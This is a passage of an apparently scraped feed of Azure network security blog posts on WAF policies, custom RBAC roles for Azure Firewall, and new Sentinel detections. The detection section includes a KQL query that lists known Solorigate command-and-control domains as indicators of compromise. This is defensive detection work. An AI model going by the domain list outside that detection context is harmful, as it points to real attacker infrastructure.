for Azure Front Door, rule actions can be set to <A href="#" target="_blank" rel="noopener">Allow, Deny, Log or Redirect</A>. In a WAF policy for Azure Application Gateway, rule actions can be set to <A href="#" target="_blank" rel="noopener">Allow, Block or Log</A>. Redirect is not an available rule action for the latter.</SPAN></SPAN><BR /><BR /></LI> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Rule actions for managed rules:</STRONG> In a WAF policy for Azure Front Door, rule actions can be set to <A href="#" target="_blank" rel="noopener">Allow, Deny, Log or Redirect</A>. In a WAF policy for Azure Application Gateway, rules can be either <A href="#" target="_blank" rel="noopener">enabled or disabled</A>. It is not possible to change the rule action.</SPAN></SPAN><BR /><BR /></LI> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Types of custom rules:</STRONG> In a WAF policy for Azure Front Door, you can create custom rules based on <A href="#" target="_blank" rel="noopener">Match type or Rate Limit type</A>. Rate-limiting custom rules allow you to respond to abnormally high traffic from any given source IP, based on a customized quantity of web requests within a time frame. In a WAF policy for Azure Application Gateway, you can configure <A href="#" target="_blank" rel="noopener">Match type</A> custom rules, and rate-limiting type is not available.</SPAN></SPAN><BR /><BR /></LI> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Exclusion lists:</STRONG> In a WAF policy for Azure Front Door, you can create <A href="#" target="_blank" rel="noopener">exclusion lists at a rule level, at a rule group level, and at a rule set level.</A> You can apply exclusions for matches on <A href="#" target="_blank" rel="noopener">request header name, request cookie name, query string args name and request body post args name</A>, and the exclusions can be applied to specific rules, rule groups or rule sets. In a WAF policy for Azure Application Gateway, the exclusions are a global setting. This means the exclusions will apply to all active rules within the scope of your WAF policy. You can apply exclusions for matches on <A href="#" target="_blank" rel="noopener">request header name, request cookie name and request args name</A>. You could alternatively apply a dedicated WAF policy at different association levels in your Azure Application Gateway, using <A href="#" target="_blank" rel="noopener">per-site WAF policy</A> or <A href="#" target="_blank" rel="noopener">per-URI WAF policy</A>.</SPAN></SPAN></LI> </UL> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">&nbsp;</SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">In this article, we provided a snapshot of the current Azure WAF feature set. We’d love to hear more from you. Feel free to leave comments below or let us know more about new features you need in our <A href="#" target="_blank" rel="noopener">Microsoft Azure Feedback</A> forum.</SPAN></SPAN></P> Mon, 19 Apr 2021 13:43:37 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-web-application-firewall-waf-config-versus-waf-policy/ba-p/2270525 camilamartins 2021-04-19T13:43:37Z Role Based Access Control for Azure Firewall https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/role-based-access-control-for-azure-firewall/ba-p/2245598 <P>Network security requirements involve providing limited access and granting administrative permissions to users within a network. Role assignments are the way you control access to Azure back end and infrastructure resources. If the <A href="#" target="_self">built-in roles</A>&nbsp;do not meet the specific needs of your organization, Azure Role Based Access Control (RBAC) allows account owners to create <A href="#" target="_self">custom roles</A>&nbsp; that an administrator can assign to Users/User groups.</P> <P>You can <A href="#" target="_self">configure role assignments</A>&nbsp;after you have defined the scope, either via Azure Portal, PowerShell, CLI or RestAPI.</P> <P class="lia-indent-padding-left-420px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_1-1617147303683.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268393i840B3551CBBD1EE4/image-size/small?v=v2&amp;px=200" role="button" title="tobio_1-1617147303683.png" alt="tobio_1-1617147303683.png" /></span></P> <P>In some instances, the built-in roles may be either too permissive or insufficient for the assignment that is required. Access should be provided using the principle of least privilege and every role should be carefully created with the user’s duties in mind, as a security control when creating user privileges. In this situation, you will also need to know what role actions are available.<BR /><BR /></P> <P>In this article, we discuss the actions that may be used to create security conscious roles and templates that you can use to create and assign roles for Azure Firewall. Once you understand the boundaries for the role you are trying to create, you can use the template below or modify it by carefully selecting the actions required and assigning it to the user.</P> <P>There are various levels of administrative roles you might be looking to assign, and this may be done at a management group level, subscription level, resource group level or resource level. Azure RBAC focuses on managing user <A href="#" target="_self">actions</A>  at these different scopes. <BR /><BR /></P> <P>To create a custom role, you must provide the following input.</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "DisplayName": "", "Description": "", "Actions": [ ], "NotActions": [ ], "DataActions": [ ], "NotDataActions": [ ], "AssignableScopes": [ ] }</LI-CODE> <P>&nbsp;</P> <P>You can find the description of each requirement above in this <A href="#" target="_self">article</A>. To configure Azure roles using PowerShell, follow the steps to <A href="#" target="_self">create a custom role</A>.</P> <P>Click the “Deploy to Azure” button below to deploy a template for the Network infrastructure role discussed below from Github. You can use this custom template by editing the “action” field for the appropriate set of actions list in the samples below. Then provide the Principal ID(Object ID) of the user to assign the role. You can find a detailed <A href="#" target="_self">step by step guide here</A>.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-360px"><A title="Deploy to Azure" href="#" target="_blank" rel="noopener"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_1-1617144867781.png" style="width: 171px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268390i43D583B561E4554F/image-dimensions/171x41?v=v2" width="171" height="41" role="button" title="tobio_1-1617144867781.png" alt="tobio_1-1617144867781.png" /></span></A></P> <P class="lia-indent-padding-left-360px">&nbsp;</P> <P><STRONG>The following 3 administrator examples are common in network scenarios:</STRONG></P> <P>&nbsp;</P> <P><FONT color="#333399"><EM>Firewall Security Administrator</EM></FONT><BR />This role is assigned to an admin that is responsible for the security configurations in the network. Access control is used to manage connectivity, making sure actions are carefully assigned. This admin can analyze the security risk of each connection via the network and application rules and make changes as required.</P> <P>&nbsp;</P> <LI-CODE lang="applescript">"Microsoft.Network/azureFirewalls/networkRuleCollections/delete", "Microsoft.Network/azurefirewalls/write", "Microsoft.Network/azureFirewalls/applicationRuleCollections/write", "Microsoft.Network/azureFirewalls/applicationRuleCollections/delete", "Microsoft.Network/azureFirewalls/natRuleCollections/write", "Microsoft.Network/azureFirewalls/natRuleCollections/delete", "Microsoft.Network/azureFirewalls/networkRuleCollections/write", "Microsoft.Network/azureFirewalls/networkRuleCollections/delete", "Microsoft.Resources/deployments/*", "Microsoft.Network/firewallPolicies/ruleCollectionGroups/write", "Microsoft.Network/firewallPolicies/read", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Insights/alertRules/*", "Microsoft.Resources/subscriptions/resourceGroups/*", "Microsoft.Support/*"</LI-CODE> <P>&nbsp;</P> <P><FONT color="#333399"><EM>Firewall Security Reader</EM></FONT><BR />This administrator requires mostly reader privileges as maybe required in an auditor role. The permission grants visibility into existing rules and other properties of the firewall. This user is therefore only able to view and not make changes</P> <P>&nbsp;</P> <LI-CODE lang="applescript">"Microsoft.Network/azurefirewalls/read", "Microsoft.Network/azureFirewallFqdnTags/read", "Microsoft.Network/azureFirewalls/applicationRuleCollections/read", "Microsoft.Network/azureFirewalls/natRuleCollections/read", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Network/firewallPolicies/ruleCollectionGroups/read", "Microsoft.Network/virtualNetworks/read", "Microsoft.Network/firewallPolicies/read", "Microsoft.Network/firewallPolicies/ruleCollectionGroups/read", "Microsoft.Resources/subscriptions/resourceGroups/read"</LI-CODE> <P>&nbsp;</P> <P><FONT color="#333399"><EM>Network Infrastructure administrator</EM></FONT><BR />This role has more overarching rights to change the infrastructure of the firewall from a network operations perspective, but would not necessarily need access to change network and application rules like the security admin, hence viewer access. Permissions in this role include <A href="#" target="_self">FirewallWallPolicies</A>&nbsp;attributes such as: Threat Intelligence, DNS settings, Intrusion detection etc.&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">"Microsoft.Network/azurefirewalls/delete", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Network/azurefirewalls/read", "Microsoft.Network/azureFirewalls/applicationRuleCollections/read", "Microsoft.Network/azureFirewalls/applicationRuleCollections/read", "Microsoft.Network/azureFirewalls/natRuleCollections/read", "Microsoft.Network/azureFirewalls/natRuleCollections/read", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Network/firewallPolicies/*", "Microsoft.Network/ipGroups/*", "Microsoft.Resources/deployments/*", "Microsoft.Insights/alertRules/*", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Support/*", "Microsoft.Resources/subscriptions/resourceGroups/*"</LI-CODE> <P>&nbsp;</P> <P>To remove the example role when done, use the following command in PowerShell:</P> <P>&nbsp;</P> <LI-CODE lang="applescript">Remove-AzRoleDefinition -Name “Custom Role - Firewall InfraAdmin"</LI-CODE> <P>&nbsp;</P> <P><FONT color="#333399"><STRONG>Note</STRONG></FONT>: You may need the subscription owner permission if it’s the first time deploying an Azure Firewall instance in that subscription for the first deployment. This can also be achieved by registering the provider: Microsoft.ContainerService before creating the firewall.</P> <P>&nbsp;</P> <P><FONT size="3"><EM>Role Definitions use a GUID for the name, this must be unique for every role assignment on the group. </EM></FONT><BR /><FONT size="3"><EM>The roleDefName parameter is used to seed the guid() function with this value, change it for each deployment. </EM></FONT><BR /><FONT size="3"><EM>You can supply a guid or any string, as long as it has not been used before when assigning the role to the resourceGroup.</EM></FONT></P> Wed, 31 Mar 2021 18:19:12 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/role-based-access-control-for-azure-firewall/ba-p/2245598 tobiotolorin 2021-03-31T18:19:12Z New Detections for Azure Firewall in Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958 <H2>&nbsp;</H2> <P>Written in collaboration with&nbsp;<LI-USER uid="419776"></LI-USER>&nbsp;(Program Manager&nbsp;<SPAN>CxE Azure Sentinel Team)</SPAN></P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN>Recent attacks</SPAN></A><SPAN>&nbsp;highlight the fact that&nbsp;in addition to implementing appropriate security&nbsp;protection controls to defend against malicious adversaries, continuous monitoring, and response is a top priority for every organization.</SPAN><SPAN>&nbsp; To implement security&nbsp;monitoring and response from a networking perspective,&nbsp;you need visibility into traffic traversing through your network devices and detection logic to identify malicious patterns in the network traffic.&nbsp; This is a critical piece for every infrastructure/network security process.&nbsp;</SPAN></P> <P>&nbsp;</P> <P>Readers of this post will hopefully be familiar with both Azure Firewall which provides protection against network-based threats, and Azure Sentinel which provides SEIM and SOAR (security orchestration, automation, and response) capabilities.&nbsp; In this blog, we will discuss the new detections for Azure Firewall in Azure Sentinel.&nbsp; These new detections allow security teams to get Sentinel alerts if machines on the internal network attempt to query/connect to domain names or IP addresses on the internet that are associated with known IOCs, as defined in the detection rule query.&nbsp; True positive detections should be considered as Indicator of Compromise (IOC).&nbsp; Security incident response teams can then perform response and appropriate remediation actions based on these detection signals.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Scenario</H2> <P>&nbsp;</P> <P>In case of an attack, after breaching through the boundary defenses, a malicious adversary may utilize malware and/or malicious code for persistence, command-and-control, and data exfiltration.&nbsp; When malware or malicious code is running on machines on the internal network, in most cases, it will attempt to make outbound connections for command-and-control updates, and to exfiltrate data to adversary servers through the internet.&nbsp; When this happens, traffic will inevitably flow out through the network egress points where it will be processed and logged by the by devices or ideally a firewall controlling internet egress.&nbsp; The data logged by devices/firewalls processing internet egress traffic can be analyzed to detect traffic patterns suggesting/representing command-and-control or exfiltration activities (also called IOCs or Indicator of Compromise). This is the basis of network-based detections discussed in this blog.</P> <P>&nbsp;</P> <P>When customers use Azure Firewall for controlling their internet egress, Azure Firewall will log all outbound traffic and DNS query traffic if configured as a <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331" target="_blank" rel="noopener">DNS Proxy</A>, to the defined Log Analytics workspace.&nbsp; If a customer is also using Azure Sentinel, they can ingest log data produced by Azure Firewall and run built-in or custom Analytic Rules templates on this data to identify malicious traffic patterns representing IOCs, that these rules are defined to detect.&nbsp; These rules can be configured to run on a schedule and create an incident (or perform an automated action) in Azure Sentinel when there is a match.&nbsp; These incidents can then be triaged by the SOC for response and remediation.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>What’s New</H2> <P>&nbsp;</P> <P>Up until now, there were only a couple of Analytic Rule based detections for Azure Firewall available in Azure Sentinel.&nbsp; We are excited to announce availability of <STRONG>eight&nbsp;new detections</STRONG> for well-known IOCs in Azure Sentinel based on traffic patterns flowing through the Azure Firewall.&nbsp; The table below provides a list of new detections which have been added recently and are available to you at the time of publishing this blog.</P> <P>&nbsp;</P> <TABLE class="lia-align-left" style="height: 489px; width: 80%; border-style: dashed;" border="1" width="80%"> <TBODY> <TR> <TD width="40px" class="lia-align-center"><STRONG><FONT size="4">No.</FONT></STRONG></TD> <TD width="300px" height="40px"><STRONG><FONT size="4">Sentinel Analytic Rule Name</FONT></STRONG></TD> <TD width="300px" height="40px"><STRONG><FONT size="4">Sentinel Repo Link</FONT></STRONG></TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>1.&nbsp;</P> </TD> <TD width="158px" height="30px"> <P>Solorigate&nbsp;Network Beacon&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/Solorigate-Network-Beacon.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>2.</P> </TD> <TD width="158px" height="30px"> <P>Known GALLIUM domains and hashes&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/GalliumIOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>3.</P> </TD> <TD width="158px" height="30px"> <P>Known IRIDIUM&nbsp;IP&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/IridiumIOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>4.</P> </TD> <TD width="158px" height="30px"> <P>Known Phosphorus group domains/IP&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/PHOSPHORUSMarch2019IOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>5.</P> </TD> <TD width="158px" height="30px"> <P>THALLIUM domains included in&nbsp;DCU&nbsp;takedown&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/ThalliumIOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>6.</P> </TD> <TD width="158px" height="30px"> <P>Known ZINC related&nbsp;maldoc&nbsp;hash&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/ZincJan272021IOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>7.</P> </TD> <TD width="158px" height="30px"> <P>Known STRONTIUM group domains&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/STRONTIUMJuly2019IOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>8.</P> </TD> <TD width="158px" height="30px"> <P>NOBELIUM - Domain and IP IOCs - March 2021</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">NOBELIUM_DomainIOCsMarch2021.yaml </A></P> </TD> </TR> </TBODY> </TABLE> <H2>&nbsp;</H2> <P>The screenshot below shows the new Azure Firewall detections in the Azure Sentinel Analytic Rule blade.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2021-03-30 10_20_56-Azure Sentinel - Microsoft Azure and 10 more pages - Work - Microsoft​ Edge.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268290i4B38E0423B68C1A4/image-size/large?v=v2&amp;px=999" role="button" title="2021-03-30 10_20_56-Azure Sentinel - Microsoft Azure and 10 more pages - Work - Microsoft​ Edge.jpg" alt="Azure Firewall Detection Rules in Azure Sentinel" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure Firewall Detection Rules in Azure Sentinel</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How Network Based Detection Work</H2> <P>&nbsp;</P> <P>To understand how these detections work, we will examine the “Solorigate Network Beacon” detection which indicates a compromise associated with the SolarWinds exploit.&nbsp; The query snippet below identifies communication to domains involved in this incident.</P> <P>&nbsp;</P> <OL> <LI>We start by declaring all the domains that we want to find in the client request from the internal network</LI> </OL> <P>&nbsp;</P> <LI-CODE lang="javascript">let domains = dynamic(["incomeupdate.com","zupertech.com","databasegalore.com","panhardware.com","avsvmcloud.com","digitalcollege.org","freescanonline.com","deftsecurity.com","thedoccloud.com","virtualdataserver.com","lcomputers.com","webcodez.com","globalnetworkissues.com","kubecloud.com","seobundlekit.com","solartrackingsystem.net","virtualwebdata.com"]);</LI-CODE> <P>&nbsp;</P> <OL start="2"> <LI>Then we perform a union to look for traffic destined for these domains in data from multiple sources which include Common Security Log (CEF), DNS Events, VM Connection, Device Network Events, <STRONG>Azure Firewall DNS Proxy</STRONG>, and <STRONG>Azure Firewall Application Rule</STRONG> logs</LI> </OL> <P>&nbsp;</P> <LI-CODE lang="javascript">(union isfuzzy=true (CommonSecurityLog | parse .. ), (DnsEvents | parse .. ), (VMConnection |parse .. ), (DeviceNetworkEvents | parse .. ), (AzureDiagnostics | where ResourceType == "AZUREFIREWALLS" | where Category == "AzureFirewallDnsProxy" | parse msg_s with "DNS Request: " ClientIP ":" ClientPort " - " QueryID " " Request_Type " " Request_Class " " Request_Name ". " Request_Protocol " " Request_Size " " EDNSO_DO " " EDNS0_Buffersize " " Responce_Code " " Responce_Flags " " Responce_Size " " Response_Duration | where Request_Name has_any (domains) | extend DNSName = Request_Name | extend IPCustomEntity = ClientIP ), (AzureDiagnostics | where ResourceType == "AZUREFIREWALLS" | where Category == "AzureFirewallApplicationRule" | parse msg_s with Protocol 'request from ' SourceHost ':' SourcePort 'to ' DestinationHost ':' DestinationPort '. Action:' Action | where isnotempty(DestinationHost) | where DestinationHost has_any (domains) | extend DNSName = DestinationHost | extend IPCustomEntity = SourceHost ) )</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <OL start="3"> <LI>When this rule query is executed (based on schedule), it will analyze logs from all the data sources defined in the query which also includes the Azure Firewall DNS Proxy and Application Rule logs.&nbsp; The result will identity hosts in the internal network which attempted to query/connect to one of the malicious domains which were declared in Step 1</LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Instructions to Configure Azure Firewall Detections in Sentinel</H2> <P>&nbsp;</P> <P>These detections are available as Analytic Rules in Azure Sentinel and can be quickly deployed by following the steps below.</P> <P>&nbsp;</P> <OL> <LI>Open the <STRONG>Azure Sentinel</STRONG> blade in the Azure Portal</LI> <LI>Select the Sentinel workspace where you have the Azure Firewall logs</LI> <LI>Select <STRONG>Analytics</STRONG> blade and then click on <STRONG>Rule templates</STRONG></LI> <LI>Under <STRONG>Data Sources,</STRONG> filter by <STRONG>Azure Firewall</STRONG></LI> <LI>Select the Rule template you want to enable and click <STRONG>Create rule&nbsp;</STRONG>and configure rule settings to create a rule</LI> </OL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Create_Sentinel_Rule_For_AzFirewall2.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268283iB1B8009EEC819295/image-size/large?v=v2&amp;px=999" role="button" title="Create_Sentinel_Rule_For_AzFirewall2.gif" alt="Steps to Configure Azure Firewall Rules in Azure Sentinel" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Steps to Configure Azure Firewall Rules in Azure Sentinel</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Summary</H2> <P>&nbsp;</P> <P>Azure Firewall logs can help identify patterns of malicious activity and Indicators of Compromise (IOCs) in the internal network.&nbsp; Built-in Analytic Rules in Azure Sentinel provide a powerful and reliable method for analyzing these logs to detect traffic representing IOCs in your network.&nbsp; With added support for Azure Firewall to these detections, you can now easily detect malicious traffic patterns traversing through Azure Firewall in your network which allows you to rapidly respond and remediate the threats.&nbsp; We encourage all customers to utilize these new detections to help improve your overall security posture.</P> <P>&nbsp;</P> <P>As new attack scenarios surface and associated detections are created in future, we will evaluate them and add support for Azure Firewall or other Network Security products, where applicable.&nbsp; You can also contribute new connectors, detections, workbooks, analytics and more for Azure Firewall in Azure Sentinel. Get started now by joining the <A href="#" target="_blank" rel="noopener">Azure Network Security</A> plus <A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters</A> communities on GitHub and following the guidance.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><SPAN>Additional Resources</SPAN></H2> <P>&nbsp;</P> <UL> <LI>To learn more about Azure Firewall, visit: &nbsp;<A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/firewall</A></LI> <LI>To learn more about Azure Sentinel, visit: &nbsp;<A href="#" target="_blank" rel="noopener">http://aka.ms/ninjatraining</A></LI> </UL> <H2>&nbsp;</H2> <P>&nbsp;</P> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; -webkit-box-reflect: initial; -webkit-highlight: initial; -webkit-hyphenate-character: initial; -webkit-line-break: initial; -webkit-line-clamp: initial; -webkit-mask-box-image: initial; -webkit-mask: initial; -webkit-mask-composite: initial; -webkit-perspective-origin-x: initial; -webkit-perspective-origin-y: initial; -webkit-print-color-adjust: initial; -webkit-rtl-ordering: initial; -webkit-ruby-position: initial; -webkit-tap-highlight-color: initial; -webkit-text-combine: initial; -webkit-text-decorations-in-effect: initial; -webkit-text-emphasis: initial; -webkit-text-emphasis-position: initial; -webkit-text-fill-color: initial; -webkit-text-security: initial; -webkit-text-stroke: initial; -webkit-transform-origin-x: initial; -webkit-transform-origin-y: initial; -webkit-transform-origin-z: initial; -webkit-user-drag: initial; -webkit-user-modify: initial; white-space: initial; widows: initial; width: initial; will-change: initial; word-break: initial; word-spacing: initial; x: initial; y: initial; z-index: initial;">&nbsp;</DIV> <DIV class="ms-editor-squiggler" style="color: initial; font: initial; font-feature-settings: initial; font-kerning: initial; font-optical-sizing: initial; font-variation-settings: initial; forced-color-adjust: initial; text-orientation: initial; text-rendering: initial; -webkit-font-smoothing: initial; -webkit-locale: initial; -webkit-text-orientation: initial; -webkit-writing-mode: initial; writing-mode: initial; zoom: initial; place-content: initial; place-items: initial; place-self: initial; alignment-baseline: initial; animation: initial; appearance: initial; aspect-ratio: initial; backdrop-filter: initial; backface-visibility: initial; background: initial; background-blend-mode: initial; baseline-shift: initial; block-size: initial; border-block: initial; border: initial; border-radius: initial; border-collapse: initial; border-end-end-radius: initial; border-end-start-radius: initial; border-inline: initial; border-start-end-radius: initial; border-start-start-radius: initial; inset: initial; box-shadow: initial; box-sizing: initial; break-after: initial; break-before: initial; break-inside: initial; buffered-rendering: initial; caption-side: initial; caret-color: initial; clear: initial; clip: initial; clip-path: initial; clip-rule: initial; color-interpolation: initial; color-interpolation-filters: initial; color-rendering: initial; color-scheme: initial; columns: initial; column-fill: initial; gap: initial; column-rule: initial; column-span: initial; contain: initial; contain-intrinsic-size: initial; content: initial; content-visibility: initial; counter-increment: initial; counter-reset: initial; counter-set: initial; cursor: initial; cx: initial; cy: initial; d: initial; display: block; dominant-baseline: initial; empty-cells: initial; fill: initial; fill-opacity: initial; fill-rule: initial; filter: initial; flex: initial; flex-flow: initial; float: initial; flood-color: initial; flood-opacity: initial; grid: initial; grid-area: initial; height: 0px; hyphens: initial; image-orientation: initial; image-rendering: initial; inline-size: initial; inset-block: initial; inset-inline: initial; isolation: initial; letter-spacing: initial; lighting-color: initial; line-break: initial; list-style: initial; margin-block: initial; margin: initial; margin-inline: initial; marker: initial; mask: initial; mask-type: initial; max-block-size: initial; max-height: initial; max-inline-size: initial; max-width: initial; min-block-size: initial; min-height: initial; min-inline-size: initial; min-width: initial; mix-blend-mode: initial; object-fit: initial; object-position: initial; offset: initial; opacity: initial; order: initial; origin-trial-test-property: initial; orphans: initial; outline: initial; outline-offset: initial; overflow-anchor: initial; overflow-wrap: initial; overflow: initial; overscroll-behavior-block: initial; overscroll-behavior-inline: initial; overscroll-behavior: initial; padding-block: initial; padding: initial; padding-inline: initial; page: initial; page-orientation: initial; paint-order: initial; perspective: initial; perspective-origin: initial; pointer-events: initial; position: initial; quotes: initial; r: initial; resize: initial; ruby-position: initial; rx: initial; ry: initial; scroll-behavior: initial; scroll-margin-block: initial; scroll-margin: initial; scroll-margin-inline: initial; scroll-padding-block: initial; scroll-padding: initial; scroll-padding-inline: initial; scroll-snap-align: initial; scroll-snap-stop: initial; scroll-snap-type: initial; shape-image-threshold: initial; shape-margin: initial; shape-outside: initial; shape-rendering: initial; size: initial; speak: initial; stop-color: initial; stop-opacity: initial; stroke: initial; stroke-dasharray: initial; stroke-dashoffset: initial; stroke-linecap: initial; stroke-linejoin: initial; stroke-miterlimit: initial; stroke-opacity: initial; stroke-width: initial; tab-size: initial; table-layout: initial; text-align: initial; text-align-last: initial; text-anchor: initial; text-combine-upright: initial; text-decoration: initial; text-decoration-skip-ink: initial; text-indent: initial; text-overflow: initial; text-shadow: initial; text-size-adjust: initial; text-transform: initial; text-underline-offset: initial; text-underline-position: initial; touch-action: initial; transform: initial; transform-box: initial; transform-origin: initial; transform-style: initial; transition: initial; user-select: initial; vector-effect: initial; vertical-align: initial; visibility: initial; -webkit-app-region: initial; border-spacing: initial; -webkit-border-image: initial; -webkit-box-align: initial; -webkit-box-decoration-break: initial; -webkit-box-direction: initial; -webkit-box-flex: initial; -webkit-box-ordinal-group: initial; -webkit-box-orient: initial; -webkit-box-pack: initial; 